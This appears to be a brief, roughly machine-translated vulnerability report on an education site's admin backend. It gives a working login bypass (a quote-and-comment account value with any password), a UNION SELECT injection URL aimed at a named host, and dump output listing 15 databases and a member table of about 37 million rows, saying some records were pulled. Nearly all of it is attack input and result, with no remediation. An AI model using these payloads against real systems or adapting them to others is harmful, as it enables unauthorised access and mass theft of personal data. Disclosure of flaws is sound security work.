Qidian education background universal password/SQL injection vulnerability involving more than 3717 million user data
Qidian education background universal password/SQL Injection Vulnerability
Http://account2.gongfubb.com/home/admin? ACT = AC account: 1' # Random Password
Injection is everywhere in the background
http://account2.gongfubb.com/home/admin/UserInfo.php?UID=-37171694%20UNION%20SELECT%201,user%28%29,database%28%29,4,5,6,7,8,9,10,11,12http://account2.gongfubb.com/home/admin/PayQuery.php?OTI=201512140846302252P11
15 Databases
available databases [15]:[*] information_schema[*] mysql[*] pay[*] pinyin[*] rpt[*] sce10[*] sce11[*] sce12[*] sce3[*] sce4[*] sce5[*] sce9[*] scenario[*] ucenter[*] uchome
... 3717W user?
Database: ucenter
+ ------------ + --------- +
| Table | Entries |
+ ------------ + --------- +
| Uc_members | 37171193 |
+ ------------ + --------- +
Dump a few pieces of data, it seems that there is actually...